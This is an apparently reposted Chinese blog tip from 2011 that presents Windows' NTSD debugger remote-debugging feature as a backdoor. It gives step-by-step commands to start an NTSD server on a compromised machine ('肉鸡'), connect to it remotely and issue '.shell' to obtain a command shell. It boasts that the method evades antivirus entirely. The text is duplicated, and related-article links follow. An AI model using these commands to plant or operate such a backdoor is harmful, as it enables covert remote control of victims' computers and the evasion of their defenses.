微软的“后门”:NTSD.exe,NTSD 的远程调试功能
2011-05-23 16:06
501 查看
本文转自:http://www.iceseo.tk/Vulnerability/wei-ruan-de-hou-men-NTSD-exe-NTSD-de-yuan-cheng-diao-shi-gong-neng.html
1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。
2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。
3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。
又是个留后门的好方法,全免杀,而且永不被杀……
这个其实是 NTSD.exe 的正常功能,远程调试功能。
1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。
2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。
3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。
又是个留后门的好方法,全免杀,而且永不被杀……
这个其实是 NTSD.exe 的正常功能,远程调试功能。
相关文章推荐
- 远程调试监视器(MSVSMON.EXE)似乎没有在远程计算机上运行“的完美解决方案
- 将VMware与SoftICE基于网络的远程调试功能相结合
- hh.exe的隐藏参数 【微软的后门】
- hh.exe的隐藏参数 【微软的后门】
- VS2010+VMWare 远程调试exe程序的配置总结
- 如何开启远程调试功能
- 转:vs2012远程调试功能的改进
- VC 2008 远程调试(msvsmon.exe是什么进程)
- DCOM Server Process Launcher[为 DCOM 服务提供加载功能。] php 的调试程序 DbgListener.exe 需要这个否则调试不了
- Android版火狐:远程调试功能指南
- vs2012远程调试功能的改进
- 关于打开tomcat的远程调试功能
- VS2013远程调试功能
- vs2012远程调试功能的改进
- tomcat开启远程调试功能
- [Reomting Debug] 巧用VS 的remote debug 功能远程调试程序 经验分享.
- VS2010中C#实现远程调试功能
- VS远程调试exe无法启动解决办法
- RPDB-让PDB(Python调试工具)支持远程调试功能
- "Microsoft Visual Studio 远程调试监视器”(MSVSMON.EXE) 似乎没有在远程计算机上运行"的解决方案之一